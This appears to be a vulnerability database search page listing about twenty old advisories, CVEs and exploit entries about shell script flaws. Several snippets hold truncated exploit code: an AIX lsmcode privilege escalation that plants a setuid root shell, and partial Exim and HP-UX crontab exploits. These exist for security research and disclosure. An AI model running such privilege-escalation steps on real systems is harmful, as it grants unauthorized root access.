340 matches found

securityvulns
added 2006/02/22 12:0 a.m., 39 views

[SA18963] Mac OS X "__MACOSX" ZIP Archive Shell Script Execution

TITLE: Mac OS X "__MACOSX" ZIP Archive Shell Script Execution SECUNIA ADVISORY ID: SA18963 VERIFY ADVISORY: http://secunia.com/advisories/18963/ CRITICAL: Extremely critical IMPACT: System access WHERE: From remote OPERATING SYSTEM: Apple Macintosh OS X http://secunia.com/product/96/ DESCRIPTION:...

6.7 AI score
Exploits: 0
Tenable Nessus
added 2006/01/15 12:0 a.m., 17 views

Ubuntu 4.10 : sudo vulnerability (USN-28-1)

Liam Helmer discovered an input validation flaw in sudo. When the standard shell 'bash' starts up, it searches the environment for variables with a value beginning with ''. For each of these variables a function with the same name is created, with the function body filled in from the environment...

5.7 AI score
Exploits: 0
CERT
added 2005/09/22 12:0 a.m., 34 views

Mozilla Firefox fails to properly sanitize user-supplied URIs via shell script

Overview A lack of input validation in a supplemental shell script included with some Mozilla browsers may allow a remote, unauthenticated attacker to execute arbitrary commands. Description The Linux versions of the Mozilla Firefox and Mozilla Suite web browsers include a wrapper shell script fo...

7.5 CVSS, 6.7 AI score, 0.45887 EPSS
Exploits: 0, References: 5
securityvulns
added 2005/09/21 12:0 a.m., 49 views

Firefox Command Line URL Shell Command Injection

Secunia Advisory: SA16869 Release Date: 2005-09-20 Critical: Extremely critical Impact: System access Where: From remote Solution Status: Vendor Patch Software: Mozilla Firefox 1.x Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. CVE reference:...

7.5 CVSS, 1.1 AI score, 0.45887 EPSS
Exploits: 0
FreeBSD
added 2005/09/06 12:0 a.m., 28 views

firefox & mozilla -- command line URL shell command injection

A Secunia Advisory reports: Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in th...

7.5 CVSS, 6 AI score, 0.45887 EPSS
Exploits: 0, References: 3
Packet Storm
added 2005/08/14 12:0 a.m., 33 views

x_aix5_bellmail.pl.txt

-bash-2.05b$ -bash-2.05b$ cat xaix5bellmail.pl !/usr/bin/perl FileName: xaix5bellmail.pl Exploit "Race condition vulnerability BUGTRAQ ID: 8805" of /usr/bin/bellmail command on Aix5 to change any file owner to current user. Usage : xaix5bellmail.pl aimfile aimfile : then file wich you want to cho...

7.4 AI score
Exploits: 0
Tenable Nessus
added 2005/07/13 12:0 a.m., 19 views

FreeBSD : konversation -- shell script command injection (5c7bb4dd-6a56-11d9-97ec-000c6e8f12ef)

Konversation comes with Perl scripts that do not properly escape shell characters on executing a script. This makes it possible to attack Konversation with shell script command injection. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin...

7.5 CVSS, 5.4 AI score, 0.14916 EPSS
Exploits: 0, References: 5
UbuntuCve
added 2005/05/02 4:0 a.m., 19 views

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

2.1 CVSS, 5.8 AI score, 0.00078 EPSS
Exploits: 0, References: 1
OSV
added 2005/05/02 4:0 a.m., 4 views

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

5.9 AI score
Exploits: 0, References: 6
NVD
added 2005/05/02 4:0 a.m., 13 views

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

2.1 CVSS, 6 AI score, 0.00078 EPSS
Exploits: 0, References: 5
Exploit DB
added 2005/02/07 12:0 a.m., 37 views

Exim 4.42 - Local Privilege Escalation

!/bin/sh Local Lame R00T sploit for exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...

7.4 AI score
Exploits: 0
CVE
added 2005/02/06 5:0 a.m., 54 views

CVE-2005-0018

CVE-2005-0018 concerns the f2c package (f2 shell script) where a symlink attack on temporary files allows a local user to read arbitrary files. Affected feature is the f2 script in the f2c package version 3.1, with root cause outlined as a symlink-based local file read. The impact is limited to c...

2.1 CVSS, 5.9 AI score, 0.00078 EPSS
Exploits: 0, References: 5, Affected Software: 1
Cvelist
added 2005/02/06 5:0 a.m., 16 views

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

5.9 AI score, 0.00078 EPSS
Exploits: 0, References: 5
FreeBSD
added 2005/01/19 12:0 a.m., 21 views

konversation -- shell script command injection

Konversation comes with Perl scripts that do not properly escape shell characters on executing a script. This makes it possible to attack Konversation with shell script command injection...

7.5 CVSS, 6.5 AI score, 0.14916 EPSS
Exploits: 0, References: 1
exploitpack
added 2004/12/21 12:0 a.m., 9 views

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

1.7 AI score
Exploits: 0
Cvelist
added 2004/09/01 4:0 a.m., 12 views

CVE-2002-1109

securetar, as used in AMaViS shell script 0.2.1 and earlier, allows users to cause a denial of service CPU consumption via a malformed TAR file, possibly via an incorrect file size parameter...

6.5 AI score, 0.0007 EPSS
Exploits: 0, References: 3
Debian
added 2001/09/23 11:52 p.m., 55 views

[SECURITY] [DSA-078-1] slrn command invocation

Package : slrn Problem type : remote command invocation Debian-specific: no Byrial Jensen found a nasty problem in slrn a threaded news reader. The notice on slrn-announce describes it as follows: When trying to decode binaries, the built-in code executes any shell scripts the article might...

5.9 AI score
Exploits: 0
Packet Storm
added 2001/08/30 12:0 a.m., 15 views

cnn_unsubscribe_bot.txt

CNN List Un-Subscribe bot Date: 8/22/01 Author: Jay Daniels PROBLEM: Anyone can Un-Subscribe other users from CNN's distribution list by placing a random number at the end of unsubscribe cgi URL's memberid. CAUSE: There is no confirmation request! I can't remember if there is a confirmation reque...

7.4 AI score
Exploits: 0
exploitpack
added 2000/11/19 12:0 a.m., 9 views

HP-UX 11.0010.20 crontab - Overwrite Files

HP-UX 11.0010.20 crontab - Overwrite Files !/bin/sh HP-UX 11.00/10.20 crontab Kyong-won,Cho [email protected] Usage : ./crontab.sh if -z "$1" then echo "Usage : $0 " exit fi cat /tmp/crontabexp !/bin/sh ln -sf $1 $1 EOF chmod 755 /tmp/crontabexp EDITOR=/tmp/crontabexp export EDITOR crontab -e ...

0.2 AI score
Exploits: 0
Packet Storm
added 1999/08/17 12:0 a.m., 25 views

killmod-0.69.lsm

killmod-0.69 killmod.php3 is a php front end that calls a simple shell script killmod.sh and allows you to use the +++ath0 bug to hang up older modems. ------------------------------------------------------------------------------------------------ killmod-0.69.tar.gz contains: --- README...

7.4 AI score
Exploits: 0